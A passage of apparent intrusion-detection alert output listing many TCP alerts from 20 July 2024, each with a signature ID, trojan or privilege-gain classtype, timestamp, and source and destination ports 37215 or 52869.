                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816504
                      SID:2829579
                      Source Port:32888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2835222
                      Source Port:47452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.825081
                      SID:2025132
                      Source Port:59162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.432131
                      SID:2027339
                      Source Port:33560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.094539
                      SID:2027339
                      Source Port:60544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.943244
                      SID:2835222
                      Source Port:47638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.631749
                      SID:2025132
                      Source Port:54194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.175286
                      SID:2027339
                      Source Port:50620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.208558
                      SID:2027339
                      Source Port:38938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.109136
                      SID:2025132
                      Source Port:59800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.320866
                      SID:2027339
                      Source Port:58754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.082384
                      SID:2835222
                      Source Port:44494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312311
                      SID:2027339
                      Source Port:42756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.660516
                      SID:2025132
                      Source Port:48318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.197215
                      SID:2025132
                      Source Port:52982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2835222
                      Source Port:57286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.343151
                      SID:2835222
                      Source Port:39838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2829579
                      Source Port:51412
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.228425
                      SID:2027339
                      Source Port:55586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.079349
                      SID:2027339
                      Source Port:48408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.640831
                      SID:2831300
                      Source Port:35834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.944701
                      SID:2025132
                      Source Port:59102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2829579
                      Source Port:42104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.146232
                      SID:2835222
                      Source Port:45252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.340422
                      SID:2027339
                      Source Port:56000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.111275
                      SID:2025132
                      Source Port:48622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.400635
                      SID:2027339
                      Source Port:35110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.115778
                      SID:2831300
                      Source Port:46138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2835222
                      Source Port:40570
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2835222
                      Source Port:32876
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.668349
                      SID:2831300
                      Source Port:53924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2829579
                      Source Port:54968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.606848
                      SID:2831300
                      Source Port:47194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.919746
                      SID:2027339
                      Source Port:53294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.387027
                      SID:2025132
                      Source Port:56974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.891313
                      SID:2027339
                      Source Port:51320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053062
                      SID:2835222
                      Source Port:53248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.774505
                      SID:2027339
                      Source Port:53844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.940871
                      SID:2025132
                      Source Port:60192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.125263
                      SID:2027339
                      Source Port:55758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.374641
                      SID:2025132
                      Source Port:38620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.634292
                      SID:2829579
                      Source Port:51646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.455918
                      SID:2027339
                      Source Port:36932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.520226
                      SID:2831300
                      Source Port:51562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.110860
                      SID:2835222
                      Source Port:40532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2835222
                      Source Port:57714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.810783
                      SID:2027339
                      Source Port:46080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2829579
                      Source Port:50398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667513
                      SID:2831300
                      Source Port:37132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.107634
                      SID:2025132
                      Source Port:45970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.697010
                      SID:2831300
                      Source Port:45262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.999569
                      SID:2027339
                      Source Port:35682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.510714
                      SID:2027339
                      Source Port:59026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2835222
                      Source Port:49640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.133789
                      SID:2025132
                      Source Port:44138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2829579
                      Source Port:35718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.479085
                      SID:2027339
                      Source Port:33450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.549014
                      SID:2027339
                      Source Port:60312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2835222
                      Source Port:47242
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.648203
                      SID:2831300
                      Source Port:44442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.109943
                      SID:2831300
                      Source Port:55062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.976791
                      SID:2027339
                      Source Port:57122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.751507
                      SID:2027339
                      Source Port:53576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.729311
                      SID:2831300
                      Source Port:49758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.458332
                      SID:2027339
                      Source Port:51990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2835222
                      Source Port:58690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.947663
                      SID:2027339
                      Source Port:33434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.328791
                      SID:2025132
                      Source Port:49800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.859405
                      SID:2831300
                      Source Port:55328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.384732
                      SID:2027339
                      Source Port:39072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.562957
                      SID:2027339
                      Source Port:37252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.354788
                      SID:2831300
                      Source Port:40962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.377547
                      SID:2831300
                      Source Port:52764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.178669
                      SID:2027339
                      Source Port:44326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.187391
                      SID:2025132
                      Source Port:50668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.439012
                      SID:2025132
                      Source Port:48844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2835222
                      Source Port:33562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2829579
                      Source Port:37422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.161851
                      SID:2025132
                      Source Port:50178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.059915
                      SID:2027339
                      Source Port:47832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.762774
                      SID:2025132
                      Source Port:58250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2835222
                      Source Port:35562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.690149
                      SID:2027339
                      Source Port:55002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.863888
                      SID:2025132
                      Source Port:52352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.039129
                      SID:2835222
                      Source Port:52762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.743796
                      SID:2027339
                      Source Port:46648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591702
                      SID:2027339
                      Source Port:35926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.702732
                      SID:2027339
                      Source Port:49674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.386032
                      SID:2027339
                      Source Port:54594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.357099
                      SID:2027339
                      Source Port:53504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.931222
                      SID:2027339
                      Source Port:56994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.285840
                      SID:2027339
                      Source Port:52268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.146543
                      SID:2025132
                      Source Port:45488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2829579
                      Source Port:52758
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.331813
                      SID:2831300
                      Source Port:45648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.305474
                      SID:2025132
                      Source Port:50966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.598416
                      SID:2027339
                      Source Port:57734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2829579
                      Source Port:38012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.652877
                      SID:2027339
                      Source Port:47380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2835222
                      Source Port:49194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.524729
                      SID:2027339
                      Source Port:47114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045143
                      SID:2835222
                      Source Port:51032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.076593
                      SID:2829579
                      Source Port:45364
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2835222
                      Source Port:38422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633744
                      SID:2829579
                      Source Port:57288
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.241196
                      SID:2831300
                      Source Port:39282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.807274
                      SID:2027339
                      Source Port:37612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.388537
                      SID:2831300
                      Source Port:44252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.944699
                      SID:2025132
                      Source Port:53900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.715288
                      SID:2027339
                      Source Port:55744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.034156
                      SID:2025132
                      Source Port:58954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.318733
                      SID:2025132
                      Source Port:41494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.169212
                      SID:2027339
                      Source Port:56148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2829579
                      Source Port:59924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.788688
                      SID:2027339
                      Source Port:51846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.032975
                      SID:2027339
                      Source Port:35288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2835222
                      Source Port:59674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.331820
                      SID:2831300
                      Source Port:39354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.370228
                      SID:2025132
                      Source Port:45868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.175191
                      SID:2027339
                      Source Port:34602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.739204
                      SID:2027339
                      Source Port:47310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.703914
                      SID:2027339
                      Source Port:41410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.075905
                      SID:2027339
                      Source Port:54498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.124551
                      SID:2027339
                      Source Port:56988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222029
                      SID:2835222
                      Source Port:58950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.578727
                      SID:2027339
                      Source Port:35996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.691725
                      SID:2025132
                      Source Port:52688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.139934
                      SID:2831300
                      Source Port:59082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.410892
                      SID:2027339
                      Source Port:54372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.450130
                      SID:2831300
                      Source Port:58138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:11.743968
                      SID:2025132
                      Source Port:52868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.592319
                      SID:2025132
                      Source Port:37212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.292992
                      SID:2025132
                      Source Port:33712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2835222
                      Source Port:52842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2835222
                      Source Port:55552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.862410
                      SID:2829579
                      Source Port:55724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.844704
                      SID:2831300
                      Source Port:37406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.154601
                      SID:2831300
                      Source Port:37598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.862410
                      SID:2835222
                      Source Port:44920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.802341
                      SID:2025132
                      Source Port:35090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.888934
                      SID:2831300
                      Source Port:47644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.485100
                      SID:2025132
                      Source Port:53756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.154067
                      SID:2835222
                      Source Port:47450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2829579
                      Source Port:55702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.697003
                      SID:2027339
                      Source Port:34624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2835222
                      Source Port:54404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.503242
                      SID:2027339
                      Source Port:43326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974782
                      SID:2835222
                      Source Port:38850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.443306
                      SID:2025132
                      Source Port:46994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.694589
                      SID:2027339
                      Source Port:48562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.880291
                      SID:2831300
                      Source Port:40646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.340422
                      SID:2025132
                      Source Port:39600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.159648
                      SID:2027339
                      Source Port:47212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.182071
                      SID:2831300
                      Source Port:41506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.559170
                      SID:2831300
                      Source Port:51992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2829579
                      Source Port:46804
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2829579
                      Source Port:41478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.994464
                      SID:2025132
                      Source Port:43924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.037548
                      SID:2027339
                      Source Port:52344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110861
                      SID:2829579
                      Source Port:48034
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.745622
                      SID:2025132
                      Source Port:55122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.113254
                      SID:2829579
                      Source Port:55470
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.243820
                      SID:2027339
                      Source Port:38550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.722161
                      SID:2027339
                      Source Port:51824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.942398
                      SID:2025132
                      Source Port:34136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.765940
                      SID:2831300
                      Source Port:42118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.084136
                      SID:2025132
                      Source Port:46518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.630627
                      SID:2829579
                      Source Port:50484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2835222
                      Source Port:56566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.749469
                      SID:2831300
                      Source Port:45456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2835222
                      Source Port:34212
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.486908
                      SID:2025132
                      Source Port:37328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.932731
                      SID:2831300
                      Source Port:54026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.949070
                      SID:2831300
                      Source Port:57400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.384732
                      SID:2027339
                      Source Port:51482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634165
                      SID:2829579
                      Source Port:58556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.063335
                      SID:2027339
                      Source Port:40962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.142802
                      SID:2027339
                      Source Port:46616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.563475
                      SID:2831300
                      Source Port:52248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.522141
                      SID:2027339
                      Source Port:57308
                      Destination Port:52869
                      Protocol:TCP
